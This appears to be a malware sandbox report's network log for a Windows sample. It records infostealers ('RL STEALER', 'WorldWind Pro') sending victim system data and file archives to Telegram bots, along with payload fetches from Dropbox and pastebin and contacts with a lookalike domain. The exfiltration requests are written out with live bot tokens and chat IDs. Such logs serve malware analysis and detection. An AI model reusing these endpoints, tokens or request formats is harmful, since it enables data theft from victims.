Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80Host: api.telegram.orgContent-Length: 674280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="4218323f-0b5f-4f02-ae6c-04af12749150"Host: api.telegram.orgContent-Length: 142488Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="5b073ce5-982c-4d6f-86c1-5eb9016cb213"Host: api.telegram.orgContent-Length: 142488Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="2ac1b142-5e04-41ec-aec2-aa44ac23098b"Host: api.telegram.orgContent-Length: 137522Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="756f27b2-8e1e-41d6-84d0-70bf6be4b848"Host: api.telegram.orgContent-Length: 137522Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9e6ac9ab89e3Host: api.telegram.orgContent-Length: 672709Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204
Source: unknown	TCP traffic detected without corresponding DNS query: 94.232.249.204

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A187A94 InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,CreateFileW,InternetCloseHandle,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF68A187A94

Source: global traffic	HTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C3CBD.tmp.Installer.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3EF8C0C6DCE8981733A6%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/134349%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E06/07/2024%2011:27:15%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E617%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /event.php HTTP/1.1User-Agent: Mozilla 5/0Host: auth.xn--conbase-sfb.xyzCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
